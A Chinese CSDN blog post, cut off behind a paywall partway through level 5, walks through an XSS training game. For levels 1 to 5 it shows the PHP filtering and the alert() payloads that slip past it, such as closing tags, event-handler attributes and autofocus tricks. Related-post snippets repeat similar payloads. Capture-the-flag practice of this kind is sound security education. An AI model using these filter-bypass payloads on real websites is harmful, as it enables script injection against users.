XSS挑战小游戏

最新推荐文章于 2024-05-06 12:53:36 发布
最新推荐文章于 2024-05-06 12:53:36 发布
阅读量624 收藏 1
点赞数 1
分类专栏: XSS跨站
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25899635/article/details/102476013
版权

**

XSS小游戏

找到了一个xss练习平台,在线地址:http://test.xss.tv/

实验环境也可以本地搭建,不过需要php+mysql的环境:

xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8
**
lvevel1:
在这里插入图片描述通过查看右边源码发现$str从url接收一个get型name参数,且并没有进行任何过滤,直接echo出来,所以此时可以构造任意可弹窗payload.

<script>alert(/xss/)</script>
<svg/onload=alert(1)>
....

lvevel2:
在这里插入图片描述
从url中接受一个keyword参数,不过这里用到一个过滤函数htmlspecialchars(),将预定义的字符串转换为HTML实体,采用黑名单绕过.
payload:

" onclick=alert(/xss/)		//点击一下输入框触发
" onmouseover=alert(/xss/)		//鼠标划过输入框触发
 "><script>alert(/xss/)</script>		//闭合input
 .......

lvevel3

在这里插入图片描述
这个级别在input中也进行了htmlspecialchars过滤,只能使用js事件来构造payload
payloaad:

' onmouserover=alert(/xss/) //
相当于: <input name=keyword value='  ' onmouseover=alert(1)// '>

lvevel4
在这里插入图片描述

  1. str_replace(">", " " ,$str),此函数将变量str中的字符>转换为空,转换时区分大小写。同理将<装换为空
  2. 经过htmlspecialchars()函数,将一些预定义符号转换为html实体。
    payload:
" onfocus=alert(/xss/) autofocus="
" onclick=alert(/xss/) //
....

lvevel5
在这里插入图片描述

  1. strtolower($_GET[“keyword”]) 将字符串转换为小写
  2. str_replace("<script","&l
最低0.47元/天 解锁文章
Mandorr
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
微信小游戏源码100套-PHP
07-06
这些小游戏不仅能够提升开发者的编程技巧,还能作为实际项目经验的积累,为他们在微信小游戏平台上的开发提供实践基础。 首先,我们要理解PHP在微信小游戏开发中的角色。PHP是一种服务器端脚本语言,主要用于web...
050 XSS通关小游戏——xss challenge
鸡蛋炒鸡蛋
03-05 5683
文章目录一:下载与部署二:通关过程首页level-01level-02level-03level-04level-05level-06level-07level-08level-09 一:下载与部署 xss challenge是个有关反射型xss的测试通关挑战,一共有20关。 下载地址:xss challenge (访问密码:donMkh) 下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可   二:通关过程 这个是我自己的通关方法,不一定很准确 首页 level-01 点击
XSS Challenges 靶场通关解析
Flag少侠的博客
05-06 2053
XSS Challenges(跨站脚本攻击挑战)是一种用于学习和测试跨站脚本(XSS)漏洞的实验性平台。这些挑战旨在帮助安全研究人员和开发人员了解XSS漏洞的工作原理、检测方法和防御技巧。通常,XSS Challenges平台提供一系列不同级别和类型的XSS漏洞场景,参与者需要利用这些漏洞实现特定的攻击目标。这些挑战可以包括在网页输入框中注入恶意脚本、利用DOM(文档对象模型)漏洞执行JavaScript代码等。参与者需要通过分析和利用漏洞,成功地触发XSS漏洞并实现攻击目标,从而完成挑战
xss挑战之旅
m0_71326960的博客
03-16 293
使用docker搭建xss挑战之旅运行环境,xss挑战之旅level1-level3
xss挑战
weixin_43995159的博客
02-05 188
xss闯关小游戏
xss小游戏
weixin_44110913的博客
03-01 702
<p></p><p>最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬@Mramydnei,喜欢XSS的大家可以一起来学习交流。</p> 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一起学习,互相进步成长。 第一关,没有任何疑问,简单的不能再简单,没有任何过滤 输入点...
XSS-8注入靶场闯关(小游戏)——第八关
qq_39330735的博客
02-04 845
XSS-8注入靶场闯关(小游戏)——第八关,通关详解,HTML的十进制实体字符串绕过
xss挑战之旅环境搭建(docker)
x_13579的博客
03-25 195
xss挑战之旅环境搭建
XSS挑战之旅---游戏通关攻略
qq_36584013的博客
07-23 1783
最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬Mramydnei,喜欢XSS的大家可以一起来学习交流。 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一起学习,互相进步成长。 第一关,没有任何疑问,简单的不能再简单,没有任何过滤 输入点在url里面,参数name 输出点在页面里面,没有任何限制 所以可以构造payl...
XSS-14、15注入靶场闯关(小游戏)——第十四、五关
qq_39330735的博客
02-04 981
XSS-15注入靶场闯关(小游戏)——第十五关,文件链接注入通关详解
xss小游戏1-20,详细攻略(level14,level19详解)
jhfjdf的博客
07-14 3075
XSS小游戏通关攻略 level1 直接修改name参数的值为: <script>alert(1)</script> 解释:利用<script>标签下的alert()弹窗 level2 尝试使用level1的: <script>alert(1)</script> 查看网页源代码: 很明显,level2关卡的值被传到了value里 尝试使用 " onmouseover='alert(1)' 闭合vlaue的双引号 level3 尝试
H5小游戏:一笔连成
10-17
【描述】:该H5小游戏的运行环境是LINUX 6.x操作系统配合Nginx服务器,这表明游戏的后端服务部署在Linux系统下,并且通过Nginx作为Web服务器对外提供服务。Nginx以其高性能、稳定性以及对静态资源处理能力强的特点,...
跳一跳小游戏.zip
05-29
通过分析这个“跳一跳”小游戏,我们可以学习到PHP编程、前端开发、数据库管理和Web应用部署等相关知识,同时也能够体验到游戏开发的乐趣和挑战。无论是初学者还是经验丰富的开发者,都可以从中受益,提升自己的技能...
xssgame.zip
06-10
在这个“xssgame.zip”压缩包中,我们有一个名为“xss小游戏靶场”的练习平台,旨在帮助用户了解和学习如何防范XSS攻击。这个靶场可能包含了多个级别,每个级别代表了不同类型的XSS漏洞,比如反射型XSS、存储型XSS和...
黑客模拟入侵小游戏
05-10
《黑客模拟入侵小游戏》是一款专为初涉网络攻防领域的人设计的游戏,旨在提供一个安全的环境,让玩家了解黑客攻击的基本概念和技术。这款游戏虽然可能对资深的IT专业人士显得较为简单,但对于新手而言,它是一个...
基于java开发的游戏攻略社区微信小程序
03-30
总的来说,基于Java开发的游戏攻略社区微信小程序是一个集技术挑战和创新于一体的项目。它要求开发者不仅精通Java编程,还要熟悉微信小程序的开发环境和规范,以及数据库管理和Web服务设计。通过这样的项目,开发者...
四字成语答题猜成语游戏小程序源码
06-02
【四字成语答题猜成语游戏小程序源码】是一款基于微信小程序平台开发的互动娱乐应用,主要功能是通过答题挑战的方式让玩家猜出正确的四字成语。这款游戏设计巧妙,结合了中国的传统文化与现代科技,旨在提升用户对...
微信朋友圈测试小游戏源码 php版.zip
11-15
3. **数据库设计**:小游戏可能需要存储用户数据、游戏成绩、挑战记录等信息,因此涉及数据库设计。可能使用MySQL或SQLite等关系型数据库系统,需要了解SQL语句,包括数据的增删改查操作。 4. **前端技术**:尽管...
dvwa xss小游戏
最新发布
07-09
dvwa是一个非常流行的Web安全教程平台,其中包含了一个名为XSS(Cross-Site Scripting,跨站脚本攻击)的小游戏部分。这个小游戏的设计目的是让学习者亲身体验和理解XSS漏洞。在游戏中,玩家通常需要在输入框中插入特定的代码片段,以触发服务器返回含有恶意脚本的结果,进而展示对网站安全性的影响。 在这个过程中,学习者可以了解到如何构造注入恶意HTML或JavaScript代码,以及浏览器是如何渲染和执行这些代码的。通过这种方式,他们能够提升防止XSS攻击的安全意识和技术能力。玩dvwa XSS小游戏可以帮助新手程序员了解防御此类常见Web漏洞的基本策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值